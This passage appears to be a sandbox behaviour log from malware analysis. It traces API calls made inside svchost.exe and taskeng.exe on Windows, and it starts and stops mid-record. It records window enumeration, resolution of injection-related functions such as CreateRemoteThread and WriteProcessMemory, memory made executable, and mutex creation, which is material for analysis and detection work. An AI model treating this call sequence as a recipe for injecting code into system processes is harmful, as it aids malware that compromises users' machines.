lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.743] GetClassNameA (in: hWnd=0x2001a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.743] Sleep (dwMilliseconds=0x64) [0071.847] EnumWindows (lpEnumFunc=0x4164058, lParam=0x2da0000) [0071.847] GetClassNameA (in: hWnd=0x3013e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="TaskSwitcherWnd") returned 15 [0071.847] GetClassNameA (in: hWnd=0x300b2, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.847] GetClassNameA (in: hWnd=0x300ee, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.847] GetClassNameA (in: hWnd=0x400c0, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.847] GetClassNameA (in: hWnd=0x10146, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="ATL:000007FEF5D052C0") returned 20 [0071.847] GetClassNameA (in: hWnd=0x20118, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0071.847] GetClassNameA (in: hWnd=0x2001e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0071.847] GetClassNameA (in: hWnd=0x20028, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0071.847] GetClassNameA (in: hWnd=0x1007c, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.847] GetClassNameA (in: hWnd=0x1007a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.847] GetClassNameA (in: hWnd=0x10066, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.847] GetClassNameA (in: hWnd=0x10090, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.847] GetClassNameA (in: hWnd=0x10084, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.847] GetClassNameA (in: hWnd=0x10082, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.847] GetClassNameA (in: hWnd=0x1007e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.847] GetClassNameA (in: hWnd=0x1005e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Button") returned 6 [0071.848] GetClassNameA (in: hWnd=0x10056, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0071.848] GetClassNameA (in: hWnd=0x100fa, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.848] GetClassNameA (in: hWnd=0x500a2, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.848] GetClassNameA (in: hWnd=0x10092, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0071.848] GetClassNameA (in: hWnd=0x101ae, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="populationopenings") returned 18 [0071.848] GetClassNameA (in: hWnd=0x800a8, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0071.848] GetClassNameA (in: hWnd=0x300c6, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.848] GetClassNameA (in: hWnd=0x400d0, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0071.848] GetClassNameA (in: hWnd=0x400f0, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0071.848] GetClassNameA (in: hWnd=0x300de, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.848] GetClassNameA (in: hWnd=0x300ca, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.848] GetClassNameA (in: hWnd=0x400c4, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.848] GetClassNameA (in: hWnd=0x300ac, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Desktop User Picture") returned 20 [0071.848] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Doctrine_alcohol_win") returned 20 [0071.848] GetClassNameA (in: hWnd=0x101a6, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="sensorsDemocratcls") returned 18 [0071.848] GetClassNameA (in: hWnd=0x101a2, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Const_advertisement_window") returned 26 [0071.848] GetClassNameA (in: hWnd=0x1019e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="BagsShakiratourismwnd") returned 21 [0071.848] Sleep (dwMilliseconds=0x64) [0071.956] EnumWindows (lpEnumFunc=0x4164058, lParam=0x2da0000) [0071.956] Sleep (dwMilliseconds=0x64) [0072.065] EnumWindows (lpEnumFunc=0x4164058, lParam=0x2da0000) [0072.065] Sleep (dwMilliseconds=0x64) [0072.174] EnumWindows (lpEnumFunc=0x4164058, lParam=0x2da0000) [0083.906] EnumWindows (lpEnumFunc=0x4164058, lParam=0x2da0000) Thread: id = 70 os_tid = 0xb20 Thread: id = 71 os_tid = 0xb64 Thread: id = 72 os_tid = 0xb68 Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xa7e5000" os_pid = "0x2cc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x45c" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b580" [0xc000000f], "LOCAL" [0x7] Thread: id = 46 os_tid = 0xb08 Thread: id = 47 os_tid = 0xacc Thread: id = 48 os_tid = 0xaa8 Thread: id = 49 os_tid = 0x9f0 Thread: id = 50 os_tid = 0x89c Thread: id = 51 os_tid = 0x444 Thread: id = 52 os_tid = 0x788 Thread: id = 53 os_tid = 0x354 Thread: id = 54 os_tid = 0x5d0 Thread: id = 55 os_tid = 0x608 Thread: id = 56 os_tid = 0x600 Thread: id = 57 os_tid = 0x5fc Thread: id = 58 os_tid = 0x5dc Thread: id = 59 os_tid = 0x134 Thread: id = 60 os_tid = 0x174 Thread: id = 61 os_tid = 0x3bc Thread: id = 62 os_tid = 0x3b4 Thread: id = 63 os_tid = 0x3a4 Thread: id = 64 os_tid = 0x304 Thread: id = 65 os_tid = 0x300 Thread: id = 66 os_tid = 0x2f4 Thread: id = 67 os_tid = 0x2ec Thread: id = 68 os_tid = 0x2d8 Thread: id = 69 os_tid = 0x2d0 Thread: id = 79 os_tid = 0xbe8 Thread: id = 191 os_tid = 0x8c4 Thread: id = 237 os_tid = 0xa14 Thread: id = 316 os_tid = 0x12c Process: id = "4" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x5e7f000" os_pid = "0x50c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "2" os_parent_pid = "0x45c" cmd_line = "taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 73 os_tid = 0x9f8 Thread: id = 74 os_tid = 0x578 Thread: id = 75 os_tid = 0x574 Thread: id = 76 os_tid = 0x520 Thread: id = 77 os_tid = 0x514 Thread: id = 78 os_tid = 0x510 Thread: id = 80 os_tid = 0x73c Thread: id = 245 os_tid = 0xa4c Process: id = "5" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x61ddc000" os_pid = "0x790" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "created_scheduled_job" parent_id = "2" os_parent_pid = "0x45c" cmd_line = "taskeng.exe {227D059C-1F64-4CAA-8702-C6E9EE0D67DE} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 81 os_tid = 0x39c Thread: id = 82 os_tid = 0x440 Thread: id = 83 os_tid = 0x660 Thread: id = 84 os_tid = 0x32c Thread: id = 85 os_tid = 0x604 Thread: id = 86 os_tid = 0x328 Thread: id = 87 os_tid = 0x248 Thread: id = 231 os_tid = 0xa18 [0166.862] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76e30000 [0166.863] GetProcAddress (hModule=0x76e30000, lpProcName="Sleep") returned 0x76e52b70 [0166.863] GetProcAddress (hModule=0x76e30000, lpProcName="ReadProcessMemory") returned 0x76e7bdc0 [0166.863] GetProcAddress (hModule=0x76e30000, lpProcName="Thread32Next") returned 0x76e7a980 [0166.863] GetProcAddress (hModule=0x76e30000, lpProcName="lstrcatA") returned 0x76e7e110 [0166.863] GetProcAddress (hModule=0x76e30000, lpProcName="ExitThread") returned 0x76f96930 [0166.863] GetProcAddress (hModule=0x76e30000, lpProcName="MultiByteToWideChar") returned 0x76e45b50 [0166.863] GetProcAddress (hModule=0x76e30000, lpProcName="RtlMoveMemory") returned 0x76e526d8 [0166.863] GetProcAddress (hModule=0x76e30000, lpProcName="GetLastError") returned 0x76e52dd0 [0166.863] GetProcAddress (hModule=0x76e30000, lpProcName="lstrcmpiA") returned 0x76e340a0 [0166.864] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcAddress") returned 0x76e53690 [0166.864] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualAlloc") returned 0x76e467a0 [0166.864] GetProcAddress (hModule=0x76e30000, lpProcName="LoadLibraryA") returned 0x76e47070 [0166.864] GetProcAddress (hModule=0x76e30000, lpProcName="OpenThread") returned 0x76e4c560 [0166.864] GetProcAddress (hModule=0x76e30000, lpProcName="Process32Next") returned 0x76e8fcc0 [0166.864] GetProcAddress (hModule=0x76e30000, lpProcName="GetModuleFileNameA") returned 0x76e464a0 [0166.864] GetProcAddress (hModule=0x76e30000, lpProcName="GetModuleHandleA") returned 0x76e465e0 [0166.864] GetProcAddress (hModule=0x76e30000, lpProcName="CreateMutexA") returned 0x76e47210 [0166.864] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualProtect") returned 0x76e32ef0 [0166.864] GetProcAddress (hModule=0x76e30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e321e0 [0166.864] GetProcAddress (hModule=0x76e30000, lpProcName="GetCurrentThreadId") returned 0x76e43ee0 [0166.864] GetProcAddress (hModule=0x76e30000, lpProcName="CloseHandle") returned 0x76e52f80 [0166.865] GetProcAddress (hModule=0x76e30000, lpProcName="GetCurrentProcessId") returned 0x76e45a50 [0166.865] GetProcAddress (hModule=0x76e30000, lpProcName="WriteProcessMemory") returned 0x76e7bad0 [0166.865] GetProcAddress (hModule=0x76e30000, lpProcName="SuspendThread") returned 0x76e32f60 [0166.865] GetProcAddress (hModule=0x76e30000, lpProcName="ResumeThread") returned 0x76e413a0 [0166.865] GetProcAddress (hModule=0x76e30000, lpProcName="RtlZeroMemory") returned 0x76fa2eb0 [0166.865] GetProcAddress (hModule=0x76e30000, lpProcName="Thread32First") returned 0x76e7aa70 [0166.865] GetProcAddress (hModule=0x76e30000, lpProcName="CreateRemoteThread") returned 0x76e7c4f0 [0166.865] GetProcAddress (hModule=0x76e30000, lpProcName="OpenProcess") returned 0x76e4cad0 [0166.865] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcessHeap") returned 0x76e53050 [0166.865] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualFree") returned 0x76e41260 [0166.865] GetProcAddress (hModule=0x76e30000, lpProcName="Process32First") returned 0x76e8fdb0 [0166.866] GetProcAddress (hModule=0x76e30000, lpProcName="HeapFree") returned 0x76e53070 [0166.866] GetProcAddress (hModule=0x76e30000, lpProcName="HeapAlloc") returned 0x76fa33a0 [0166.866] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualQuery") returned 0x76e4bd40 [0166.866] GetProcAddress (hModule=0x76e30000, lpProcName="lstrlenA") returned 0x76e4caf0 [0166.866] GetProcAddress (hModule=0x76e30000, lpProcName="IsWow64Process") returned 0x76e391d0 [0166.866] GetProcAddress (hModule=0x76e30000, lpProcName="HeapReAlloc") returned 0x76f83f20 [0166.866] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x7fefdbf0000 [0166.866] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptDestroyHash") returned 0x7fefdbfdb00 [0166.867] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptReleaseContext") returned 0x7fefdbfdd10 [0166.867] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptHashData") returned 0x7fefdbfdac0 [0166.867] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptGetHashParam") returned 0x7fefdbfdb20 [0166.867] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptCreateHash") returned 0x7fefdbfdad4 [0166.867] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptAcquireContextA") returned 0x7fefdbf8180 [0166.867] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x7fefd080000 [0168.156] GetProcAddress (hModule=0x7fefd080000, lpProcName="CryptStringToBinaryA") returned 0x7fefd0ce59c [0168.156] GetProcAddress (hModule=0x7fefd080000, lpProcName="CryptBinaryToStringA") returned 0x7fefd0b4220 [0168.156] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x7fefc5b0000 [0168.161] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsFree") returned 0x7fefc5b1e74 [0168.266] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsQuery_W") returned 0x7fefc5c01b0 [0168.266] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f50000 [0168.267] GetProcAddress (hModule=0x76f50000, lpProcName="NtCreateSection") returned 0x76fa17b0 [0168.267] GetProcAddress (hModule=0x76f50000, lpProcName="NtSetInformationProcess") returned 0x76fa14d0 [0168.267] GetProcAddress (hModule=0x76f50000, lpProcName="NtMapViewOfSection") returned 0x76fa1590 [0168.267] GetProcAddress (hModule=0x76f50000, lpProcName="LdrProcessRelocationBlock") returned 0x76ffb110 [0168.267] GetProcAddress (hModule=0x76f50000, lpProcName="NtUnmapViewOfSection") returned 0x76fa15b0 [0168.267] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76d30000 [0168.267] GetProcAddress (hModule=0x76d30000, lpProcName="wsprintfW") returned 0x76d5099c [0168.267] GetProcAddress (hModule=0x76d30000, lpProcName="wsprintfA") returned 0x76dabae8 [0168.267] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x7fef7150000 [0168.273] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpReadData") returned 0x7fef715e1e0 [0168.273] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpAddRequestHeaders") returned 0x7fef716bdcc [0168.273] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpCrackUrl") returned 0x7fef715ba38 [0168.273] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpGetProxyForUrl") returned 0x7fef715e9c0 [0168.273] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpenRequest") returned 0x7fef71545f8 [0168.273] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpen") returned 0x7fef7153428 [0168.274] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpCloseHandle") returned 0x7fef71522e0 [0168.274] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpSendRequest") returned 0x7fef71574d0 [0168.274] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7fef716a56c [0168.274] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpSetOption") returned 0x7fef71539c4 [0168.274] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpReceiveResponse") returned 0x7fef715d068 [0168.274] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpConnect") returned 0x7fef7163e3c [0168.274] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x7fefe260000 [0168.274] GetProcAddress (hModule=0x7fefe260000, lpProcName=0xc) returned 0x7fefe26d9a0 [0168.274] GetProcAddress (hModule=0x7fefe260000, lpProcName=0x5) returned 0x7fefe28e450 [0168.274] GetProcAddress (hModule=0x7fefe260000, lpProcName=0xf) returned 0x7fefe261250 [0168.274] VirtualProtect (in: lpAddress=0x290000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x2b0fcf0 | out: lpflOldProtect=0x2b0fcf0*=0x40) returned 1 [0168.275] VirtualProtect (in: lpAddress=0x290000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x2b0fcf0 | out: lpflOldProtect=0x2b0fcf0*=0x4) returned 1 [0168.276] VirtualQuery (in: lpAddress=0x2a0023, lpBuffer=0x2b0fc80, dwLength=0x30 | out: lpBuffer=0x2b0fc80*(BaseAddress=0x2a0000, AllocationBase=0x2a0000, AllocationProtect=0x40, __alignment1=0xfffff880, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000, __alignment2=0x0)) returned 0x30 [0168.276] GetProcessHeap () returned 0x2b0000 [0168.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x364) returned 0x2eb690 [0168.276] RtlMoveMemory (in: Destination=0x2eb690, Source=0x2a0023, Length=0x363 | out: Destination=0x2eb690) [0168.276] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x2a0023) returned 0x0 [0168.276] GetCurrentProcessId () returned 0x790 [0168.276] GetProcessHeap () returned 0x2b0000 [0168.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x105) returned 0x2ee680 [0168.276] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ee680, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe")) returned 0x1f [0168.276] GetProcessHeap () returned 0x2b0000 [0168.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x105) returned 0x30ad00 [0168.276] GetCurrentProcessId () returned 0x790 [0168.276] wsprintfA (in: param_1=0x30ad00, param_2="%s%d%d%d" | out: param_1="C:\\Windows\\system32\\taskeng.exe37084212419363") returned 45 [0168.277] CryptAcquireContextA (in: phProv=0x2b0fc40, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b0fc40*=0x2fe190) returned 1 [0168.278] CryptCreateHash (in: hProv=0x2fe190, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b0fc98 | out: phHash=0x2b0fc98) returned 1 [0168.278] lstrlenA (lpString="C:\\Windows\\system32\\taskeng.exe37084212419363") returned 45 [0168.278] CryptHashData (hHash=0x2f1f40, pbData=0x30ad00, dwDataLen=0x2d, dwFlags=0x0) returned 1 [0168.278] CryptGetHashParam (in: hHash=0x2f1f40, dwParam=0x2, pbData=0x2b0fc48, pdwDataLen=0x2b0fc90, dwFlags=0x0 | out: pbData=0x2b0fc48, pdwDataLen=0x2b0fc90) returned 1 [0168.278] wsprintfA (in: param_1=0x30ad00, param_2="%02X" | out: param_1="73") returned 2 [0168.278] wsprintfA (in: param_1=0x30ad02, param_2="%02X" | out: param_1="D7") returned 2 [0168.278] wsprintfA (in: param_1=0x30ad04, param_2="%02X" | out: param_1="82") returned 2 [0168.278] wsprintfA (in: param_1=0x30ad06, param_2="%02X" | out: param_1="9F") returned 2 [0168.278] wsprintfA (in: param_1=0x30ad08, param_2="%02X" | out: param_1="31") returned 2 [0168.278] wsprintfA (in: param_1=0x30ad0a, param_2="%02X" | out: param_1="3B") returned 2 [0168.278] wsprintfA (in: param_1=0x30ad0c, param_2="%02X" | out: param_1="1B") returned 2 [0168.278] wsprintfA (in: param_1=0x30ad0e, param_2="%02X" | out: param_1="83") returned 2 [0168.278] wsprintfA (in: param_1=0x30ad10, param_2="%02X" | out: param_1="C5") returned 2 [0168.278] wsprintfA (in: param_1=0x30ad12, param_2="%02X" | out: param_1="48") returned 2 [0168.278] wsprintfA (in: param_1=0x30ad14, param_2="%02X" | out: param_1="C5") returned 2 [0168.278] wsprintfA (in: param_1=0x30ad16, param_2="%02X" | out: param_1="11") returned 2 [0168.278] wsprintfA (in: param_1=0x30ad18, param_2="%02X" | out: param_1="D8") returned 2 [0168.278] wsprintfA (in: param_1=0x30ad1a, param_2="%02X" | out: param_1="16") returned 2 [0168.278] wsprintfA (in: param_1=0x30ad1c, param_2="%02X" | out: param_1="68") returned 2 [0168.278] wsprintfA (in: param_1=0x30ad1e, param_2="%02X" | out: param_1="C8") returned 2 [0168.278] CryptDestroyHash (hHash=0x2f1f40) returned 1 [0168.278] CryptReleaseContext (hProv=0x2fe190, dwFlags=0x0) returned 1 [0168.278] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="73D7829F313B1B83C548C511D81668C8") returned 0x144 [0168.279] GetLastError () returned 0x0 [0168.279] Sleep (dwMilliseconds=0x1f4) [0168.865] GetCurrentProcessId () returned 0x790 [0168.865] GetCurrentThreadId () returned 0xa18 [0168.865] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x140 [0168.867] Thread32First (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.867] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.868] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.868] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.869] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.869] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.869] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.870] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.870] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.870] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.871] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.871] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.871] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.872] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.872] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.872] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.872] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.873] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.873] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.873] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.874] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.874] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.874] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.875] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.875] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.875] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.876] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.876] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.876] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.877] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.877] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.877] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.877] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.878] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.878] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.878] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.879] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.879] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.879] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.880] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.880] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.880] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.880] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.881] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.881] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.881] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.882] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.882] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.882] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.882] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.883] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.883] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.883] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.884] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.884] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.884] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.885] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.885] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.885] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.885] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.886] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.886] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.886] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.887] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.887] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.887] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.887] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.888] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.888] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.888] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.889] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.889] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.889] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.890] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.890] 